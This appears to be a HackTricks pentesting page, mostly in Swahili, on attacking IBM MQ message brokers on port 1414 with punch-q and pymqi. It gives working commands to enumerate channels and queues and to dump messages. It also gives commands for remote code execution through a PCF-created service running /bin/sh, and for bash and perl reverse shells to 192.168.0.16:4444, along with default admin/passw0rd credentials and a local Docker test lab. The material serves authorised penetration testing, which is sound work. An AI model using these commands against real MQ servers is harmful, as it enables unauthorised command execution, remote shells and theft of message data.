1414 - Pentesting IBM MQ

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic information

IBM MQ ni teknolojia ya IBM ya kusimamia foleni za ujumbe. Kama teknolojia nyingine za message broker, inakusudia kupokea, kuhifadhi, kuchakata na kuainisha taarifa kati ya wazalishaji na watumiaji.

Kwa kawaida, inaonyesha bandari ya TCP ya IBM MQ 1414. Wakati mwingine, API ya HTTP REST inaweza kuonyeshwa kwenye bandari 9443. Vipimo (Prometheus) vinaweza pia kufikiwa kutoka bandari ya TCP 9157.

Bandari ya TCP ya IBM MQ 1414 inaweza kutumika kudhibiti ujumbe, foleni, kanali, ... lakini pia kudhibiti mfano.

IBM inatoa hati kubwa ya kiufundi inayopatikana kwenye https://www.ibm.com/docs/en/ibm-mq.

Tools

Zana inayopendekezwa kwa matumizi rahisi ni punch-q, kwa matumizi ya Docker. Zana hii inatumia maktaba ya Python pymqi.

Kwa njia ya zaidi ya mikono, tumia maktaba ya Python pymqi. IBM MQ dependencies zinahitajika.

Installing pymqi

IBM MQ dependencies zinahitaji kusanikishwa na kupakiwa:

Unda akaunti (IBMid) kwenye https://login.ibm.com/.
Pakua maktaba za IBM MQ kutoka https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc. Kwa Linux x86_64 ni 9.0.0.4-IBM-MQC-LinuxX64.tar.gz.
Fanya dekompresi (tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz).
Endesha sudo ./mqlicense.sh kukubali masharti ya leseni.

If you are under Kali Linux, modify the file mqlicense.sh: remove/comment the following lines (between lines 105-110):
if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ]
 then
   echo "ERROR: This package is incompatible with this system"
   echo "       This package was built for ${BUILD_PLATFORM}"
   exit 1
fi

Sanidha hizi pakiti:

sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesRuntime-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesClient-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesSDK-9.0.0-4.x86_64.rpm

Kisha, ongeza kwa muda faili za .so kwenye LD: export LD_LIBRARY_PATH=/opt/mqm/lib64, kabla ya kutumia zana nyingine zinazotumia utegemezi hizi.

Kisha, unaweza kunakili mradi pymqi: ina vipande vya msimbo vya kuvutia, constants, ... Au unaweza kufunga maktaba moja kwa moja kwa: pip install pymqi.

Kutumia punch-q

Kwa Docker

Tumia tu: sudo docker run --rm -ti leonjza/punch-q.

Bila Docker

Nakili mradi punch-q kisha fuata readme kwa ajili ya usakinishaji (pip install -r requirements.txt && python3 setup.py install).

Baada ya hapo, inaweza kutumika na amri punch-q.

Enumeration

Unaweza kujaribu kuorodhesha jina la meneja wa foleni, watumiaji, vituo na foleni kwa kutumia punch-q au pymqi.

Meneja wa Foleni

Wakati mwingine, hakuna ulinzi dhidi ya kupata jina la Meneja wa Foleni:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 discover name
Queue Manager name: MYQUEUEMGR

Channels

punch-q inatumia orodha ya maneno ya ndani (inayoweza kubadilishwa) kutafuta vituo vilivyopo. Mfano wa matumizi:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd discover channels
"DEV.ADMIN.SVRCONN" exists and was authorised.
"SYSTEM.AUTO.SVRCONN" might exist, but user was not authorised.
"SYSTEM.DEF.SVRCONN" might exist, but user was not authorised.

Inatokea kwamba baadhi ya mifano ya IBM MQ zinakubali maombi ya MQ yasiyo na uthibitisho, hivyo --username / --password hazihitajiki. Kwa hakika, haki za ufikiaji pia zinaweza kutofautiana.

Pale tunapopata jina moja la channel (hapa: DEV.ADMIN.SVRCONN), tunaweza kuhesabu channel zingine zote.

Hesabu hiyo inaweza kufanywa kimsingi na kipande hiki cha msimbo code/examples/dis_channels.py kutoka pymqi:

import logging
import pymqi

logging.basicConfig(level=logging.INFO)

queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'

prefix = '*'

args = {pymqi.CMQCFC.MQCACH_CHANNEL_NAME: prefix}

qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)

try:
response = pcf.MQCMD_INQUIRE_CHANNEL(args)
except pymqi.MQMIError as e:
if e.comp == pymqi.CMQC.MQCC_FAILED and e.reason == pymqi.CMQC.MQRC_UNKNOWN_OBJECT_NAME:
logging.info('No channels matched prefix `%s`' % prefix)
else:
raise
else:
for channel_info in response:
channel_name = channel_info[pymqi.CMQCFC.MQCACH_CHANNEL_NAME]
logging.info('Found channel `%s`' % channel_name)

qmgr.disconnect()

... Lakini punch-q pia inaingiza sehemu hiyo (ikiwa na maelezo zaidi!). Inaweza kuzinduliwa na:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show channels -p '*'
Showing channels with prefix: "*"...

| Name                 | Type              | MCA UID | Conn Name | Xmit Queue | Description     | SSL Cipher |
|----------------------|-------------------|---------|-----------|------------|-----------------|------------|
| DEV.ADMIN.SVRCONN    | Server-connection |         |           |            |                 |            |
| DEV.APP.SVRCONN      | Server-connection | app     |           |            |                 |            |
| SYSTEM.AUTO.RECEIVER | Receiver          |         |           |            | Auto-defined by |            |
| SYSTEM.AUTO.SVRCONN  | Server-connection |         |           |            | Auto-defined by |            |
| SYSTEM.DEF.AMQP      | AMQP              |         |           |            |                 |            |
| SYSTEM.DEF.CLUSRCVR  | Cluster-receiver  |         |           |            |                 |            |
| SYSTEM.DEF.CLUSSDR   | Cluster-sender    |         |           |            |                 |            |
| SYSTEM.DEF.RECEIVER  | Receiver          |         |           |            |                 |            |
| SYSTEM.DEF.REQUESTER | Requester         |         |           |            |                 |            |
| SYSTEM.DEF.SENDER    | Sender            |         |           |            |                 |            |
| SYSTEM.DEF.SERVER    | Server            |         |           |            |                 |            |
| SYSTEM.DEF.SVRCONN   | Server-connection |         |           |            |                 |            |
| SYSTEM.DEF.CLNTCONN  | Client-connection |         |           |            |                 |            |

Queues

Kuna kipande cha msimbo chenye pymqi (dis_queues.py) lakini punch-q inaruhusu kupata vipande zaidi vya taarifa kuhusu foleni:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show queues -p '*'
Showing queues with prefix: "*"...
| Created   | Name                 | Type   | Usage   | Depth  | Rmt. QM | Rmt. Qu | Description                       |
|           |                      |        |         |        | GR Name | eue Nam |                                   |
|           |                      |        |         |        |         | e       |                                   |
|-----------|----------------------|--------|---------|--------|---------|---------|-----------------------------------|
| 2023-10-1 | DEV.DEAD.LETTER.QUEU | Local  | Normal  | 0      |         |         |                                   |
| 0 18.35.1 | E                    |        |         |        |         |         |                                   |
| 9         |                      |        |         |        |         |         |                                   |
| 2023-10-1 | DEV.QUEUE.1          | Local  | Normal  | 0      |         |         |                                   |
| 0 18.35.1 |                      |        |         |        |         |         |                                   |
| 9         |                      |        |         |        |         |         |                                   |
| 2023-10-1 | DEV.QUEUE.2          | Local  | Normal  | 0      |         |         |                                   |
| 0 18.35.1 |                      |        |         |        |         |         |                                   |
| 9         |                      |        |         |        |         |         |                                   |
| 2023-10-1 | DEV.QUEUE.3          | Local  | Normal  | 0      |         |         |                                   |
| 0 18.35.1 |                      |        |         |        |         |         |                                   |
| 9         |                      |        |         |        |         |         |                                   |
# Truncated

Exploit

Dump messages

Unaweza kulenga foleni(s)/kanali(s) ili kunusa / kutupa ujumbe kutoka kwao (operesheni isiyo na uharibifu). Examples:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages sniff

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages dump

Usisite kurudia kwenye foleni zote zilizotambuliwa.

Utekelezaji wa msimbo

Maelezo machache kabla ya kuendelea: IBM MQ inaweza kudhibitiwa kwa njia nyingi: MQSC, PCF, Command ya Kudhibiti. Orodha za jumla zinaweza kupatikana katika nyaraka za IBM MQ. PCF (Mifumo ya Amri Inayoweza Kuprogramishwa) ndiyo tunayoangazia ili kuingiliana kwa mbali na mfano. punch-q na zaidi pymqi zinategemea mwingiliano wa PCF.
Unaweza kupata orodha ya amri za PCF:
Kutoka kwa nyaraka za PCF, na
kutoka kwa constants.
Amri moja ya kuvutia ni MQCMD_CREATE_SERVICE na nyaraka zake zinapatikana hapa. Inachukua kama hoja StartCommand inayotaja programu ya ndani kwenye mfano (mfano: /bin/sh).
Pia kuna onyo la amri katika nyaraka: "Kumbuka: Amri hii inaruhusu mtumiaji kuendesha amri yoyote kwa mamlaka ya mqm. Ikiwa haki za kutumia amri hii zitatolewa, mtumiaji mbaya au asiye makini anaweza kufafanua huduma ambayo inaharibu mifumo yako au data, kwa mfano, kwa kufuta faili muhimu."
Kumbuka: kila wakati kulingana na nyaraka za IBM MQ (Marejeo ya Usimamizi), pia kuna kiunganishi cha HTTP kwenye /admin/action/qmgr/{qmgrName}/mqsc ili kuendesha amri sawa ya MQSC kwa ajili ya uundaji wa huduma (DEFINE SERVICE). Kipengele hiki hakijajadiliwa hapa bado.

Uundaji / kufuta huduma kwa PCF kwa ajili ya utekelezaji wa programu ya mbali unaweza kufanywa na punch-q:

Mfano 1

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/sh" --args "-c id"

Katika kumbukumbu za IBM MQ, unaweza kusoma amri imefanikiwa kutekelezwa:
2023-10-10T19:13:01.713Z AMQ5030I: Amri '808544aa7fc94c48' imeanza. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)]

Unaweza pia kuhesabu programu zilizopo kwenye mashine (hapa /bin/doesnotexist ... haipo):

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg
s "whatever"
Command: /bin/doesnotexist
Arguments: -c id
Service Name: 6e3ef5af652b4436

Creating service...
Starting service...
The program '/bin/doesnotexist' is not available on the remote system.
Giving the service 0 second(s) to live...
Cleaning up service...
Done

Kumbuka kwamba uzinduzi wa programu ni wa asenkroni. Hivyo unahitaji kipengele cha pili ili kutumia exploit *(listener kwa ajili ya reverse shell, uundaji wa faili kwenye huduma tofauti, uhamasishaji wa data kupitia mtandao ...)

Mfano wa 2

Kwa reverse shell rahisi, punch-q inapendekeza pia payloads mbili za reverse shell:

Moja na bash
Moja na perl

Kwa hakika unaweza kujenga moja maalum kwa kutumia amri ya execute.

Kwa bash:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444

Kwa perl:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444

Custom PCF

Unaweza kuchimba katika nyaraka za IBM MQ na kutumia moja kwa moja maktaba ya pymqi ya python ili kujaribu amri maalum za PCF ambazo hazijatekelezwa katika punch-q.

Example:

import pymqi

queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'

qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)

try:
# Replace here with your custom PCF args and command
# The constants can be found in pymqi/code/pymqi/CMQCFC.py
args = {pymqi.CMQCFC.xxxxx: "value"}
response = pcf.MQCMD_CUSTOM_COMMAND(args)
except pymqi.MQMIError as e:
print("Error")
else:
# Process response

qmgr.disconnect()

Ikiwa huwezi kupata majina ya kudumu, unaweza kurejelea nyaraka za IBM MQ.

Mfano wa MQCMD_REFRESH_CLUSTER (Decimal = 73). Inahitaji parameter MQCA_CLUSTER_NAME (Decimal = 2029) ambayo inaweza kuwa * (Doc: ):

import pymqi

queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'

qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)

try:
    args = {2029: "*"}
    response = pcf.MQCMD_REFRESH_CLUSTER(args)
except pymqi.MQMIError as e:
    print("Error")
else:
    print(response)

qmgr.disconnect()

Mazingira ya kupima

Ikiwa unataka kupima tabia na matumizi ya IBM MQ, unaweza kuunda mazingira ya ndani kulingana na Docker:

Kuwa na akaunti kwenye ibm.com na cloud.ibm.com.
Unda IBM MQ iliyowekwa kwenye kontena na:

sudo docker pull icr.io/ibm-messaging/mq:9.3.2.0-r2
sudo docker run -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR -p1414:1414 -p9157:9157 -p9443:9443 --name testing-ibmmq icr.io/ibm-messaging/mq:9.3.2.0-r2

Kwa default, uthibitishaji umewezeshwa, jina la mtumiaji ni admin na nenosiri ni passw0rd (Kigezo cha mazingira MQ_ADMIN_PASSWORD). Hapa, jina la meneja wa foleni limewekwa kuwa MYQUEUEMGR (kigezo MQ_QMGR_NAME).

Unapaswa kuwa na IBM MQ ikifanya kazi na bandari zake zikiwa wazi:

❯ sudo docker ps
CONTAINER ID   IMAGE                                COMMAND                  CREATED         STATUS                    PORTS                                                                    NAMES
58ead165e2fd   icr.io/ibm-messaging/mq:9.3.2.0-r2   "runmqdevserver"         3 seconds ago   Up 3 seconds              0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp   testing-ibmmq

Toleo la zamani la picha za IBM MQ docker ziko kwenye: https://hub.docker.com/r/ibmcom/mq/.

References

Previous1098/1099/1050 - Pentesting Java RMI - RMI-IIOP Next1433 - Pentesting MSSQL - Microsoft SQL Server

Last updated 7 days ago